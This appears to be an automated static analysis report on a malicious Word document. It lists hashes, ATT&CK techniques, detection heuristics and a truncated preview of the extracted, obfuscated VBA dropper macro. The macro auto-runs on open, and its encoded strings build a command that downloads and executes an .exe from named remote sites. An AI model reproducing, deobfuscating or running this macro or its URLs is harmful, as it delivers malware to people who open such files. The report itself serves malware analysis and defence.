Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 256de76c63fef8f5…

MALICIOUS

Office (OLE)

133.5 KB Created: 2018-02-14 22:38:00 Authoring application: Microsoft Office Word First seen: 2018-02-19
MD5: f7e808bbbbe7950383052c1578213181 SHA-1: 338ee96fec11697e0b567beaa1ada9c47dfcb83c SHA-256: 256de76c63fef8f5b66fcde726c0460ca71e958502fe1b1b3298b350e76746fb
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro utilizes a Shell() call and is configured to auto-execute via the AutoOpen function. This indicates the macro's intent is to download and execute a second-stage payload from a remote source, a common dropper behavior.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6448961-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6448961-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 25700 bytes
SHA-256: 8279dbee82cf0f386b4ca6124610a096409f2375a9da3f69c96d7c36b3332507
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "cndWJHl"
Function IUkSaFEFQja()
On Error Resume Next
RhKLwYEnLnH = (QhhiWwj - Int(qpkZlVQG) * BHVXDcjBNsLaVz / Oct(tvmovriwbGMmw) - (SCRAKWCioMEAj - Sin(1736507)))
CUjwijjV = (YtVsuj - Int(jbKHWJtQrphMv) * uaKaoOHZkuLVs / Oct(NruEJ) - (SqpDAskXVO - Sin(3615263)))
RAqZHnih = (NPiTKRGR - Int(JqQwARqDzvd) * TXEkH / Oct(vdjDWbrIdY) - (hcwrsJzZGAauT - Sin(4245807)))
oBlFsnskI = (XhHJXKz) + HJjkJKD("whzVMUiFqzO3D+O3Di+O3D+O3DQcO3D+O3Di.hQci+QciSQ'+'ci+Q'+'ciCDoccCzihNTfTcDLHoFAlJcjGIDHOnio", 11, 53)
pWmqwdmB = (KSSfKaOE - Int(BaVjPhD) * aNlwKfmnEtDi / Oct(BImdJEzJGTdV) - (BPpEjXQBi - Sin(5810756)))
nKnbktHLvC = (Szmjs - Int(jLZZzS) * FGdDdUtIcli / Oct(wAKfOjXdj) - (JRTRznS - Sin(9244874)))
KFvwv = (BwGwduNYKkupOI - Int(tGWfLq) * owuwMkMUGq / Oct(mcZrBhlBLNt) - (VvJJXtQmkIaIH - Sin(774230)))
NfPOIWJl = (nzFUoEro) + HJjkJKD("rhJQuEzXVnXiKci'+'+QcikQ0 + YWrV+WrV4H'+'NSB + (kQQci+Qci0.exkQQci+QO3D+O'+'3DciO3D+O3D0+kQ0ekO3D+O3DQ0QciWrV+WrV+Qci)Qci+Q'+'ci;QcW'+'rV+WrVi+QXGJchFQPso", 14, 131)
AHiQk = (ADapbpDwi - Int(RkzAD) * zXPlLUdYV / Oct(bsacLMwijiCW) - (ozMwdSR - Sin(1510296)))
FpjLjcBKQV = (pmfqjXNjaBTn - Int(LWBqFlS) * ZWdKbmzX / Oct(FEfmCnzVjbQzDA) - (ZZoqu - Sin(7603502)))
QwjXKGn = (foUQQCj - Int(kOIbv) * HcIiEUY / Oct(CUVVak) - (zIcLs - Sin(4718780)))
iqPXLDQlZT = (ptKfOvJ) + HJjkJKD("XXAwZPRNPjNJVDVNr'+'VO3D,[sTriNG][ChAr]39'+') roZ.((gv O3D*mdR*O3D)Zdn", 17, 51)
WDwLouPcoDS = (fPDqQK - Int(LJfzTzdsR) * SERzmtDCEQrd / Oct(tYCvLNAw) - (mKzhm - Sin(8374697)))
BtCiZiIWSC = (nXBcq - Int(wWGtWAnMti) * rlYQDRfRnSR / Oct(CFGLBQ) - (pAbRajpRqzKns - Sin(6121805)))
PCiOQR = (pASkjFW - Int(DKjPEoQ) * mwAohPUwkOzo / Oct(ciYbmPFs) - (hnTpYGtR - Sin(7074333)))
iLiHKz = (jIqSoVmAuucvCn) + HJjkJKD("maABYOhnOPRifUKELD+O3DXQci+Qci = kQci+QciQ0 Qci+QO3D+O3DcihQci+QcitQcWrVO'+'3D+O3D+WrVi+Qcitp:/Qci+QciWrV+W'+'rV/ciQci+WrV+WrVQ'+'civilbike.Qci+QcicomQci+QcWLZiS", 18, 139)
UwsvRdJZs = (RZLwVOMVrqOF - Int(dVOHDmjk) * oZYPM / Oct(lwzaldTEOOC) - (fVqkROirkS - Sin(7216080)))
kHiBkRsFrI = (ubDNkmXFC - Int(jusoToKRzsA) * BPNEHJ / Oct(VwTLbfKaFTc) - (wbzlwrdvtjTTs - Sin(4161113)))
HaOkwXPEoW = (aozjiNYjjQjR - Int(JOEzWB) * hBdRM / Oct(OnpdASFukl) - (nzdYuP - Sin(3933990)))
cEhGFH = (UGhsajH) + HJjkJKD("JNcvhqloCTiYYtvawFcHAR]1'+'07+[cHPA", 19, 15)
TtpHUT = (OZcwKZY - Int(nlJEmJbHNHD) * oqLaYTzdnD / Oct(DwOGNC) - (LXSlQmBdjr - Sin(4517527)))
ohsGpqiz = (dzMoXXNCaq - Int(uskcFHYDOF) * wjJCaYZunFGK / Oct(KqIqizACV) - (YtjKvWHoIYsCjf - Sin(4137672)))
EFwuDAzs = (pcfCWniKSOzhUP - Int(iblkI) * OdYfRzljHKcVk / Oct(XWSYkL) - (rjWaTsUKb - Sin(8930029)))
ULIMFwEKitR = (RDYKhTAzlrGQQ) + HJjkJKD("AIrKfojsMhkAohbBhhSISDoR/Qc'+'i+QWrV+WrV'+'ci?QciO3D+O3D+Qcihttp:/'+'/esen-imm'+'obilQci+Qciien.de/JQci+Qci5Qci+QcicG'+'/Qci+Qci?Qci+QWrV+WrVciht'+'QO3D+O3Dci+QcitpQWrV+WrVci+Qci:'+'WO3D+O'+'3DrV+WrVQci+QcO3D+O'+'XSaZjobkthtwzzu", 25, 189)
atGqoYnDlEt = (ERWfQhIhiYPvTu - Int(qjcANkn) * wShuPiDDFRHl / Oct(IfnoECWHvN) - (FihqTBrNRdXMi - Sin(7565825)))
tIYzFzXl = (CfVKdMJjiAoLJ - Int(QjDFoohzNjD) * uTAlTFBMA / Oct(mlkhwwzqiqifB) - (UHuwKFRlGDRqjz - Sin(6373270)))
SLHiiUTA = (JwhYtRUHrjz - Int(ENrORDQML) * BuZAi / Oct(PGPBJvjlwdD) - (mmHbH - Sin(9046987)))
hjhGkSfRjo = (FjLIMAzYWwBF) + HJjkJKD("HmbvScE(WrVQciWrV,[StO3D+O3DRINg][CHAR]39).REplacE('+'WrVlPGWrV,[StRINg][CHAR]96)'+') O3D).repLaCe(O3DWbLRkoUzONfS", 6, 98)
TSqWHjQk = (ZYvaniT - Int(ULhjVoWZqLfK) * wuVHLhX / Oct(GnkjSvz) - (UwTZCTj - Sin(664972)))
rqvVRD = (aZmHOEIowbi - Int(TczwYNYwD) * sXOVM / Oct(lNfNSWk) - (kFsjcr - Sin(3710674)))
QodhnMj = (VlBWVciF - Int(GjXjPt) * rzDlwQHwrpMSV / Oct(UMjYBcUppIiZ) - (LpNaU - Sin(2433083)))
iqSCcsq = (tnnslUvNJjFQnz) + HJjkJKD("azJRTJNzrci+QcO3D+O3Dibr/Qci+QcimSl6bDZ/kQ0.SpQcO'+'3D+O3DWrV+WEWSmbL", 10, 54)
iCQNdMmKB = (GdOrFWzqYCAwwQ - Int(
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.